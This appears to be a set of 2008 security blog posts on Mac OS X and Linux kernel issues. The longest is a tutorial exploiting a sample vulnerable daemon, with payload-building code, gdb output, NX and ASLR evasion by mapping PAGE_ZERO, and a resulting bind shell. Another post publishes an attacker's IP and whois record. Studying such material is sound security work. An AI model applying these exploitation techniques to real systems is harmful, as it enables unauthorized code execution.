Mon, 03 Nov 2008

Apple Mac OS X 10.4 temp_patch_ptrace(): Nonsense in kernel-land

Several software vendors realized, sometime during the 1990-2000 timeframe, that exporting system call tables within kernel address space was a bad idea. This obviously doesn't mean anything to Red Hat and other GNU/Linux vendors who are happily providing world readable System.map files. Not like anybody needs them, though.

Then again, you have to face potential funniness of contradictory measures, like Apple's own mistakes. This article won't talk about yet another bug introduced by a Linux developer working at Red Hat (and later silently fixed by another employee of the very same company), but an interesting issue with Mac OS X 10.4 systems on PowerPC.

The temp_patch_ptrace() function: how to fix an issue and introduce a new one

Although the ptrace implementation on Mac OS X is severely crippled, Apple found time to add a nifty trick that prevents immediate debugging of certain processes. Undocumented, it was obviously used only by Apple's own software, namely iTunes and related applications. A private flag set by a process disallows future interaction with it via ptrace or other mechanisms, causing the gdb debugger to fail when it tries to attach to the target process. It is a modern version of the good old trick first described publicly by Silvio Cesare in one of his anti-debugging articles.

Apple, possibly with the intention of helping anti-piracy software vendors (in their quest to preserve all that is good and just in the software industry and beyond), added a KPI (Kernel Programming Interface) that lets a kernel extension patch the ptrace system call. The sysent variable (the BSD equivalent of the Linux syscall_table, holding pointers, arguments and other data of the supported system calls) is not exported in any Mac OS X system, as a measure to prevent abuse (for example, in rootkits and other malware subverting kernel-land code).

Therefore, there's no absolutely reliable method to patch the system call table without resorting to hacks (these can be extremely reliable, but they are almost always tied to specific versions and/or architectures). Hence the existence of temp_patch_ptrace. The implementation of the function follows:

/*
 * WARNING - this is a temporary workaround for binary compatibility issues
 * with anti-piracy software that relies on patching ptrace (3928003).
 * This KPI will be removed in the system release after Tiger.
 */
uintptr_t temp_patch_ptrace(uintptr_t new_ptrace)
{
        struct sysent *         callp;
        sy_call_t *                     old_ptrace;

        if (new_ptrace == 0)
                return(0);

        enter_funnel_section(kernel_flock);
        callp = &sysent[26];
        old_ptrace = callp->sy_call;

        /* only allow one patcher of ptrace */
        if (old_ptrace == (sy_call_t *) ptrace) {
                callp->sy_call = (sy_call_t *) new_ptrace;
        }
        else {
                old_ptrace = NULL;
        }
        exit_funnel_section( );

        return((uintptr_t)old_ptrace);
}

It's not available on Leopard. The implications of this are fairly evident:

So, why would Apple stop exporting the sysent structure and still provide a function whose purpose is patching a system call? And why bother hiding sysent at all, if a linear memory search (the technique historically used by Linux rootkits) locates it in memory trivially?
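The "only allow one patcher" behaviour of the function quoted above can be modelled in a few lines. This is a toy sketch in plain Python, not kernel code: SyscallTable, original_ptrace and the dictionary standing in for sysent are names invented here for illustration, and only the slot number 26 comes from the quoted source.

```python
# Toy model of the single-patcher check; no real kernel structures are involved.
PTRACE_SLOT = 26  # index used by the quoted temp_patch_ptrace()


def original_ptrace(*args):
    """Stand-in for the kernel's own ptrace handler (hypothetical)."""
    return "original"


class SyscallTable:
    """Hypothetical stand-in for sysent, holding only the ptrace slot."""

    def __init__(self):
        self.sy_call = {PTRACE_SLOT: original_ptrace}

    def temp_patch_ptrace(self, new_ptrace):
        """Install new_ptrace once; return the old handler, or None if refused."""
        if new_ptrace is None:
            return None
        old_ptrace = self.sy_call[PTRACE_SLOT]
        # Only allow one patcher: the slot must still hold the original handler.
        if old_ptrace is original_ptrace:
            self.sy_call[PTRACE_SLOT] = new_ptrace
            return old_ptrace
        return None


def first_hook(*args):
    return "first"


def second_hook(*args):
    return "second"


table = SyscallTable()
first_result = table.temp_patch_ptrace(first_hook)    # succeeds
second_result = table.temp_patch_ptrace(second_hook)  # refused
```

In this model the first caller gets the original handler back and the second gets nothing, which mirrors the NULL returned by the real function once the slot no longer points at ptrace.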

Tue, 28 Oct 2008

Linux Kernel Silent Patching: VMI write_ldt_entry() privilege escalation

Once again, the Linux kernel developers delight us with their always discreet (read: silent, no-advisory, no-warning policy) and wonderful patching practices. Sometime between 2.6.24 and 2.6.25 a patch from a Red Hat developer was committed into the Linux kernel git tree, implementing changes to the VMI interfaces hooking some functions dealing with the GDT and LDT.

diff --git a/arch/x86/kernel/vmi_32.c b/arch/x86/kernel/vmi_32.c
index 6ca515d..edfb09f 100644
--- a/arch/x86/kernel/vmi_32.c
+++ b/arch/x86/kernel/vmi_32.c
@@ -235,7 +235,7 @@ static void vmi_write_ldt_entry(struct desc_struct *dt, int entry,
 				const void *desc)
 {
 	u32 *ldt_entry = (u32 *)desc;
-	vmi_ops.write_idt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
+	vmi_ops.write_ldt_entry(dt, entry, ldt_entry[0], ldt_entry[1]);
 }
 
 static void vmi_load_sp0(struct tss_struct *tss,

It's not entirely clear whether there's a reliable way to abuse this issue (data passed to sys_modify_ldt goes through several checks and might not trigger the vulnerable code path right away). The original commit does mention, however, that it was discovered when JRE caused failures. In addition, vmi_ops.write_idt_entry might do further validation, thus reducing the issue to a mere denial of service in the worst case. It also affects only x86 VMI guests.

Wed, 15 Oct 2008

Custom shellcode and return-to-libc on Mac OS X

After some time without any updates coming up, this article will show some techniques and strategies to improve reliability of exploit code in Mac OS X Tiger and Leopard (up to 10.5.5). Specifically, we will look at a technique to aid loading of stager shellcode and evading non-executable stack restrictions. This was hinted at in the "OS X Exploits and Defense" book (Elsevier), chapter 7, which I wrote earlier this year (co-authored the book with Kevin Finisterre).

Ideally, when shellcode size restrictions exist, and possibly in almost any situation where subtle and discreet operation is required, you should never use a standard or publicly available shellcode, like the usual so-called "bind shell" or "reverse shell". Not only are they identified by IDS vendors, but they will also fail when certain constraints are present. In addition, a combination of stubs (splitting functionality in small dock-able shellcodes) with an encoder will defeat most packet inspectors and signature-based detection products (for example, antivirus engines).

Caveats

When using a stager, you might find a few different shortcomings that prevent your code from being reliable or effective across the widest range of architectures and platforms:

The sample vulnerable daemon

vulnerabled is a (TCP based) network daemon which processes incoming messages and seeks a callto:// handler. Then it reads whatever is trailing after the handler string. Imagine this daemon is used to connect to a VoIP solution that calls numbers provided by a crawler to do phone spam or targeted advertisement.

The daemon properly reads the incoming message into a heap allocated buffer, named tmpbuf. Its contents are zeroed every time the loop runs, therefore making reliable usage of the buffer impossible on two consecutive runs if tmpbuf points to the same address. A memory leak would help in this situation, but there's none.

Afterwards, data is read from the incoming connection into tmpbuf. The daemon NULL-terminates the buffer, but if the tmpbuf address has been overwritten, the NULL byte is written out of bounds. Such a situation could be useful in certain cases, but we won't look into this particular possibility in depth in this article. A single NULL byte write can indeed lead to arbitrary code execution, as long as some requirements are met: here the offset equals the length of the data received from the client, so we need to send a payload of a specific length to match the offset (that is, the target address minus the address of tmpbuf) at which we want our NULL to be injected.

    char *tmpbuf = NULL;
    char vulnbuf[265];
...
    tmpbuf = malloc(8092);
...
    while(1) {
...
        memset(vulnbuf, 0, sizeof(vulnbuf));
...
        if ((recvlen = recv(connfd, tmpbuf, 8092, 0)) != -1)
        {
            tmpbuf[recvlen] = '\0';
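The offset arithmetic for the stray terminator write is simple enough to sketch. The helper below is illustrative only: payload_length_for_nul is a name made up here, the 8092 limit is the size passed to recv() in the excerpt, and the addresses in the example are arbitrary.

```python
RECV_MAX = 8092  # size passed to recv() in the daemon excerpt


def payload_length_for_nul(tmpbuf_addr, target_addr, recv_max=RECV_MAX):
    """Return the payload length that makes tmpbuf[recvlen] land on target_addr.

    The terminator is written at tmpbuf + recvlen, so the required length is
    simply the distance between the two addresses.
    """
    offset = target_addr - tmpbuf_addr
    if not 0 < offset <= recv_max:
        raise ValueError("target is not reachable with a single recv()")
    return offset


# Arbitrary example: a target 0x100 bytes past the buffer needs 256 bytes.
example_length = payload_length_for_nul(0x800000, 0x800100)
```

Targets below the buffer, or further away than one recv() can fill, are rejected, which is the "specific length" constraint mentioned in the text.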

If the incoming data contains the handler string, the daemon copies the trailing string into the stack-based buffer named vulnbuf, which has a fixed size of 265 bytes. This is a stack-based buffer overflow condition with a twist: we can abuse variable ordering to mount a more sophisticated attack against vulnerabled. Instead of a single packet payload, we will dedicate one packet to sending the main payload and a second one to triggering it and subverting the execution flow in an elegant manner. This will allow us to introduce the main topic of this article: creating custom shellcode for evading security measures and improving the reliability of stagers.

            if ((recvlen > handlerlen) &&
                (!memcmp(tmpbuf, DEFAULT_HANDLER, handlerlen)))
            {
                memcpy(vulnbuf, tmpbuf+handlerlen, recvlen-handlerlen);
                fprintf(stdout, "received message: %s\n", vulnbuf);
            }

            if (recvlen > 4 && (tmpbuf[0] == '.') &&
                (tmpbuf[1] == 'e') && (tmpbuf[2] == 'n') &&
                (tmpbuf[3] == 'd'))
                break;

The exploit approach

In the previous section we walked through the code of the sample vulnerable daemon, reviewing the potentially exploitable security issues. Finally, we suggested an elegant approach to abuse the issues for reliable code execution against Apple Mac OS X Leopard 10.5.5. This section will explain said approach thoroughly.

The layout of the attack is as follows:

  1. Initial payload:
    1. Handler string (callto://)
    2. Small NOP sled
    3. Custom mprotect() and pre-stager shellcode
    4. Stager shellcode
    5. Instructions to return or exit gracefully
    6. Random alphanumeric padding
    7. Address to EBP
  2. Second "trigger" payload:
    1. Handler string (callto://)
    2. End control message (.end)
    3. Address to write at EBP+4 (saved EIP)

data += self.shellcode
data += self.random_string(265-len(self.shellcode))
data += self.random_string(4)
data += self.random_string(4)
data += struct.pack('<L', ebp_address)

heap_jumper = ''
heap_jumper += '.end'
heap_jumper += struct.pack('<L', 0x80000c)

You might have noticed that overwriting saved EIP by writing at EBP requires us to write 4 bytes before the new EIP value. The length of the end control message is... exactly 4 bytes. That is the condition that lets us abuse the variable ordering to point tmpbuf directly at EBP and overwrite saved EIP correctly. The final payload is copied by recv to the address held in EBP:

(gdb) p $ebp
$32 = (void *) 0xbffff888
(gdb) p tmpbuf
$33 = 0xbffff888 ".end\f"
(gdb) x/2x tmpbuf
0xbffff888:	0x646e652e	0x0080000c
(gdb) x/i 0x0080000c
0x80000c:	nop
(gdb) p recvlen 
$34 = 8

Note the address pointing to the heap buffer which was allocated initially. Mac OS X has an absolutely predictable heap: fortunate for us, unfortunate for end-user security. We have effectively overwritten a pointer to force the next recv call to write arbitrary data at the address held in EBP.
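The two words gdb printed at tmpbuf can be cross-checked against the trigger packet with a few lines of Python. This sketch uses Python 3 byte strings rather than the Python 2 style strings of the exploit excerpt; END_MARKER and HEAP_TARGET are names chosen here, and the values are the ones visible in the debugging session.

```python
import struct

END_MARKER = b".end"      # control message checked by the daemon
HEAP_TARGET = 0x0080000C  # address seen in the gdb session

# Second packet: 4 bytes landing on saved EBP, then 4 bytes landing on saved EIP.
trigger = END_MARKER + struct.pack("<L", HEAP_TARGET)

# Reinterpret the 8 bytes as two little-endian words, as "x/2x tmpbuf" does.
first_word, second_word = struct.unpack("<2L", trigger)
```

The first word is just the ASCII of ".end" read as a little-endian integer, and the low byte of the address (0x0c, a form feed) is what gdb renders as "\f" after the marker.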

(gdb) c
Continuing.
vulnerabled(1654) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed
*** set a breakpoint in malloc_error_break to debug

Program received signal SIGTRAP, Trace/breakpoint trap.
0x0080002b in ?? ()

(gdb) x/4i $eip
0x80002b:	xor    %eax,%eax
0x80002d:	push   %eax
0x80002e:	push   %eax
0x80002f:	push   $0x1012

(gdb) i f
Stack level 0, frame at 0xbffff888:
 eip = 0x80002b; saved eip 0xbf800000
 called by frame at 0x800032
 Arglist at 0xbffff880, args: 
 Locals at 0xbffff880, Previous frame's sp is 0xbffff888
 Saved registers:
  ebp at 0xbffff880, eip at 0xbffff884

There's a catch: if the binary has been compiled with IBM Stack Smashing Protector (SSP, formerly known as ProPolice), the arrangement of variables in memory will be different and we won't be able to reach the pointer from the stack-based buffer, thus rendering this approach impossible.

Custom shellcode, stagers and non-executable stack

The custom shellcode explained here will use only a single function from libSystem (the libc of sorts on OS X): mprotect. It should be feasible to change memory protections using a different method, but this is suitable for a re-spawning daemon since we can bruteforce the dyld stub address.

It uses the mmap and mlock system calls to map memory at PAGE_ZERO (NULL, 0x00000000) and to lock the pages into physical memory, respectively.

This is the first time this technique appears publicly (specifically for OS X). The Mach-O binary format defines a zeroed, unmapped memory segment at position 0, named PAGE_ZERO. It remains unmapped under normal circumstances to force exceptions on NULL dereference conditions (read/write to NULL, offset from NULL when reading a member of a structure pointing at NULL, etc).

If we map PAGE_ZERO and set its permissions to read-write-execute, we will have space of PAGE_SIZE length (4096 bytes on x86) for storing shellcode stages and pretty much anything we could find useful. Side-effects of mapping PAGE_ZERO will be difficult to predict. Any future mistakes and programming errors that dereference NULL or an offset from NULL won't raise an exception. Also, if data is written there, our shellcode or data will be corrupted. Therefore, for safety purposes, we might want to leave an initial set of bytes at NULL unused (unchanged, thus zeroed). If data changes in the initial bytes, we could raise an exception to emulate normal behavior, in case it's been done as part of a test to detect our presence.

Mapping PAGE_ZERO will be clearly visible and it's not subtle if it remains in mapped state for a long time. Apparently the dyld loader and other operations during Mach-O execution time map the segment for a very short time.

The mprotect call produces the following results when executed within the context of vulnerabled after successful exploitation, before execution of the stager shellcode:

Stack                  bf800000-bffff000 [ 8188K] rwx/rwx SM=PRV  
Stack                  bffff000-c0000000 [    4K] rwx/rwx SM=COW  thread 0
Stack                   [   8192K]

And the mmap of PAGE_ZERO produces the following results (note the initial unmapped state, and the different permissions afterwards, before the final mprotect call):

Before mmap():
__PAGEZERO             00000000-00001000 [    4K] ---/--- SM=NUL .../vulnerabled
__PAGEZERO              [      4K]

Before mprotect():
__PAGEZERO             00000000-00001000 [    4K] rw-/rwx SM=NUL .../vulnerabled

After mprotect():
__PAGEZERO             00000000-00001000 [    4K] rwx/rwx SM=NUL .../vulnerabled

Now our stager shellcode will be able to write data received from the attacking host to a writable and executable region at a static address, without requiring allocation using non-static locations.
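The region listings above are all expressed in whole pages, since mprotect and mmap operate at page granularity. A small sketch of that arithmetic follows; page_base and region_kib are helper names invented here, PAGE_SIZE is the 4096 bytes quoted for x86, and the addresses are the ones shown in the listings and in the gdb session.

```python
PAGE_SIZE = 4096  # page size on x86, as stated in the text


def page_base(addr):
    """Round an address down to the start of the page that contains it."""
    return addr & ~(PAGE_SIZE - 1)


def region_kib(start, end):
    """Size of the half-open region [start, end) in KiB."""
    return (end - start) // 1024


# The two stack entries from the listing add up to the 8192K total.
lower_stack = region_kib(0xBF800000, 0xBFFFF000)
top_stack = region_kib(0xBFFFF000, 0xC0000000)

# The EBP value seen in gdb lives in the topmost stack page.
ebp_page = page_base(0xBFFFF888)
```

Rounding down with a mask is the usual way to obtain a page-aligned start address before changing protections on the page holding a given pointer.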

Conclusions

Developing custom shellcode is trivial in most situations, albeit testing can be tiresome. Mac OS X's lack of heap and mmap randomization is embarrassing, and its layout has been repeatedly demonstrated to be easily predictable. Also, heap memory permissions aren't enforced against execution (and read implies execute on Intel), thus making the heap a safe bet for storing our shellcode and other data at runtime during exploitation. ASLR in Leopard is incredibly weak, allowing trivial abuse of daemons and applications that re-spawn after an exception, and certain parts of the dyld ABI are still static. Last but not least, the lack of general memory permissions enforcement allows regions to be made executable, thus defeating the whole purpose of both ASLR and NX on OS X.

$ python vulnerabled_exploit.py -s 127.0.0.1 -p 6888
[+] Target vulnerabled at 127.0.0.1:6888 ...
[+] Running...
[+] Finished (shellcode was 152 bytes, 290 total).
[+] Check 127.0.0.1:6900 for shell.

(gdb) r
Starting program: ./vulnerabled 
Reading symbols for shared libraries ++. done
Starting ./vulnerabled (pid: 2141, port: 6888)...
connection from 127.0.0.1
tmpbuf=0x800000 vulnbuf=0xbffff74b esp=0xbffff6f0
it's a good message! (282 bytes, 273 in data)
received message: ??????????1??R???
connection from 127.0.0.1
tmpbuf=0xbffff888 vulnbuf=0xbffff74b esp=0xbffff6f0
vulnerabled(2141) malloc: *** error for object 0xbffff888: Non-aligned pointer being freed
*** set a breakpoint in malloc_error_break to debug

Program received signal SIGTRAP, Trace/breakpoint trap.
0x8fe01010 in __dyld__dyld_start ()
(gdb) c
Continuing.
Reading symbols for shared libraries .. done


$ nc 127.0.0.1 6900
id
uid=501(myuser) gid=20(staff) groups=20(staff),98(_lpadmin), ...

Tue, 16 Sep 2008

Futile attempts and the joy of locked down Apache processes

Apparently someone, in his glaring innocence, is playing around with Apache. Possibly we should start looking at mod_python or maybe mod_ssl. Maybe we can just let RBAC and PaX take care of it. But abuse departments are extremely responsive these days! One wonders what these people think when they have their DSL lines shut down.

Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28215]
Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28215]
Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28934]
Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28934]
Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28922]

The grand official Idiot of the Month, for your amusement. You might find it useful to add his IP range to your preferred spam blacklist as well. And more props to spender for the brute force prevention feature of grsecurity, which makes exploiting re-spawning daemon vulnerabilities a hell of a lot more boring and futile. Especially when you have 40 bits of ASLR on your side. Yikes!

OrgName:    Road Runner HoldCo LLC 
OrgID:      RRMA
Address:    13241 Woodland Park Road
City:       Herndon
StateProv:  VA
PostalCode: 20171
Country:    US

ReferralServer: rwhois://ipmt.rr.com:4321

NetRange:   65.184.0.0 - 65.191.255.255 
CIDR:       65.184.0.0/13 
NetName:    RR
NetHandle:  NET-65-184-0-0-1
Parent:     NET-65-0-0-0-0
NetType:    Direct Allocation
NameServer: DNS1.RR.COM
NameServer: DNS2.RR.COM
NameServer: DNS3.RR.COM
NameServer: DNS4.RR.COM
Comment:    
RegDate:    2004-04-07
Updated:    2005-05-16

OrgAbuseHandle: ABUSE10-ARIN
OrgAbuseName:   Abuse 
OrgAbusePhone:  +1-703-345-3416
OrgAbuseEmail:  abuse@rr.com

OrgTechHandle: IPTEC-ARIN
OrgTechName:   IP Tech 
OrgTechPhone:  +1-703-345-3416
OrgTechEmail:  abuse@rr.com
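Log lines like the grsec entries above can be tallied per source address to see who is crashing what. The sketch below assumes the exact line shape shown in this post; the regular expression and the tally_signals helper are illustrative and were not checked against other grsecurity message formats.

```python
import re
from collections import Counter

# Matches the "grsec: From <ip>: signal <n> sent to <path>[" part of a line.
GRSEC_SIGNAL = re.compile(
    r"grsec: From (?P<ip>\d{1,3}(?:\.\d{1,3}){3}): "
    r"signal (?P<sig>\d+) sent to (?P<path>\S+?)\["
)


def tally_signals(lines, signal=11):
    """Count how many times each source IP triggered the given signal."""
    counts = Counter()
    for line in lines:
        match = GRSEC_SIGNAL.search(line)
        if match and int(match.group("sig")) == signal:
            counts[match.group("ip")] += 1
    return counts


sample = [
    "Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28215]",
    "Sep  8 16:42:21 vmsrv21 grsec: From 65.190.223.67: signal 11 sent to /usr/sbin/apache2[apache2:28934]",
    "Sep  8 16:42:21 vmsrv21 sshd[123]: unrelated line",
]
segfaults = tally_signals(sample)
```

Feeding it a whole log file is a matter of passing the open file object, since the function only iterates over lines.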

Thu, 11 Sep 2008

Marshal and Native API bridging on Microsoft Windows (NT)

The .NET framework provides a Marshal class from its Runtime.InteropServices namespace which helps interfacing native and unmanaged data with managed code. The easy path for most of these cases is to simply use unsafe blocks and cast a pointer, but you end up losing references to allocated structures, leaking memory and likely leaving some funny exploitable condition in your unmanaged code bridge. Those pesky dangling pointers...

The function below calls an internal method to retrieve the list of loaded kernel modules from userland. It depends on NtQuerySystemInformation() and requires a heap-allocated structure array. Interfacing this with a C# managed class will require another exported function to call HeapFree() and release the allocated memory.
Using such an approach is certainly not recommended, but it will save you some hassle:

extern "C" __declspec(dllexport) PSYSTEM_MODULE_INFORMATION GetKernelModules(void)
{
	HANDLE tmpHeap = GetProcessHeap();
	PSYSTEM_MODULE_INFORMATION modList = NULL;
	
	LoadFunctionPointers();
	_getSysModules(&modList, tmpHeap);

	return modList;
}

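extern "C" __declspec(dllexport) void MyFreeHeap(LPVOID ptrToFree)
{
	/* The process heap is shared with threads the system may create, so keep
	   serialization enabled (flags = 0) rather than passing HEAP_NO_SERIALIZE. */
	if (ptrToFree != NULL)
		HeapFree(GetProcessHeap(), 0, ptrToFree);
}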

On the C# side, we will be using a Marshal structure declaration in order to be able to use the PtrToStructure method, which allows us to copy memory from unmanaged space into our managed class, and then we can release whatever memory was allocated for the native API.

[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi, Pack = 2)]
public struct SYSTEM_MODULE_INFORMATION
{
    [MarshalAs(UnmanagedType.U4)] public UInt32 Reserved1;
    [MarshalAs(UnmanagedType.U4)] public UInt32 Reserved2;
    ...
}

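// Size of one marshalled element; i is the index of the current module.
int curOffset = i * Marshal.SizeOf(typeof(SYSTEM_MODULE_INFORMATION));
// ToInt64() keeps the pointer arithmetic valid in 64-bit processes too.
IntPtr curPtr = new IntPtr(ModulesListPtr.ToInt64() + curOffset);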

Modules[i] = (SYSTEM_MODULE_INFORMATION) Marshal.PtrToStructure(curPtr,
                   typeof(SYSTEM_MODULE_INFORMATION));

[DllImport("mylib.dll", CharSet = CharSet.Unicode)]
        private extern static void MyFreeHeap(IntPtr ptr);

Depending on your target platform, you might want to adjust CharSet since Unicode is the default on NT based systems (that is, all modern versions of Windows, excluding 9x/ME if you consider them modern... although in terms of security, it seems like Windows 98 is safer, after all, most malware doesn't work on it anymore). Packing is also important, since it determines how your structure is actually laid out in memory. Values of 1-2 are safe, just verify the alignment of the variables within the structure you are trying to use.
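The effect of packing on size, field offsets and array stride can be illustrated outside .NET as well. The sketch below uses Python's ctypes as a stand-in for the Marshal machinery; the two-field Record layouts are hypothetical and unrelated to the real SYSTEM_MODULE_INFORMATION, and read_records is a helper invented here to mimic walking an array with i * sizeof offsets.

```python
import ctypes

FIELDS = [("tag", ctypes.c_uint8), ("value", ctypes.c_uint32)]


class NaturalRecord(ctypes.Structure):
    """Default alignment: 'value' is padded up to a 4-byte boundary."""
    _fields_ = FIELDS


class Pack2Record(ctypes.Structure):
    """Fields aligned to at most 2 bytes, comparable to Pack = 2."""
    _pack_ = 2
    _fields_ = FIELDS


class Pack1Record(ctypes.Structure):
    """No padding at all, comparable to Pack = 1."""
    _pack_ = 1
    _fields_ = FIELDS


def read_records(buffer, count, record_type):
    """Copy 'count' consecutive records out of a raw byte buffer."""
    size = ctypes.sizeof(record_type)
    return [record_type.from_buffer_copy(buffer, i * size) for i in range(count)]


# Serialize three packed records back to back, then walk them by offset.
raw = b"".join(bytes(Pack2Record(i, i * 100)) for i in range(3))
records = read_records(raw, 3, Pack2Record)
sizes = [ctypes.sizeof(t) for t in (NaturalRecord, Pack2Record, Pack1Record)]
```

Reading the same buffer with the wrong packing would use the wrong stride and shift every field after the first element, which is why the declared packing has to match the native structure.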
Some suggestions:

Wed, 10 Sep 2008

Alice in Wonder-setuid-emacs-land (CVE-2008-2324)

One may think that vulnerabilities can't get any more stupid, but there's always an Apple advisory to beat the record. A setuid Emacs binary? Seems like a plan. (From APPLE-SA-2008-07-31 and CVE-2008-2324).

Disk Utility
CVE-ID:  CVE-2008-2324
Available for:  Mac OS X v10.4.11, Mac OS X Server v10.4.11
Impact:  A local user may obtain system privileges
Description:  The "Repair Permissions" tool in Disk Utility makes
/usr/bin/emacs setuid. After the Repair Permissions tool has been
run, a local user may use emacs to run commands with system
privileges. This update addresses the issue by correcting the
permissions applied to emacs in the Repair Permissions tool. This
issue does not affect systems running Mac OS X v10.5 and later.
Credit to Anton Rang and Brian Timares for reporting this issue.

The "Repair Permissions" tool should have been removed from Mac OS X a long time ago.
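Checking whether a binary has picked up the setuid bit takes a few lines. The sketch below is a generic audit helper, not something taken from the advisory: mode_is_setuid and find_setuid are names chosen here, and the path in the usage line is simply the one the advisory mentions.

```python
import os
import stat


def mode_is_setuid(mode):
    """True if the setuid bit is set in a st_mode value."""
    return bool(mode & stat.S_ISUID)


def find_setuid(paths):
    """Return the regular files among 'paths' that carry the setuid bit."""
    hits = []
    for path in paths:
        try:
            info = os.stat(path)
        except OSError:
            continue  # missing or unreadable entries are skipped
        if stat.S_ISREG(info.st_mode) and mode_is_setuid(info.st_mode):
            hits.append(path)
    return hits


# Usage: lists the path only if it exists and is setuid on this machine.
suspicious = find_setuid(["/usr/bin/emacs"])
```

Running something like this after "Repair Permissions" would have shown the editor appearing in the list.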

License

Creative Commons License
Subreption blog by Subreption LLC is Licensed under a Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License.